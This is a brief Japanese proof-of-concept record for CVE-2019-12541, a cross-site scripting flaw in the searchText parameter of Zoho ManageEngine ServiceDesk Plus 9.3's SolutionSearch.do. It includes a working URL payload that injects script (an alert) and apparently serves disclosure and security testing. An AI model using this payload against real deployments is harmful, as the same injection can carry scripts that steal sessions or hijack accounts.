
# CVE-2019-12541 の概念実証: Zoho ManageEngine ServiceDesk Plus 9.3 の SolutionSearch.do の searchText パラメータを介した格納型 XSS。セキュリティテスト用のペイロードを含む。
情報説明: Zoho ManageEngine ServiceDesk Plus 9.3 に問題が発見されました。SolutionSearch.do の searchText パラメータを介して XSS が発生します。
著者: Tarantula Team の Concobe - VinCSS (Vingroup のメンバー)
domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f&selectName=Solutions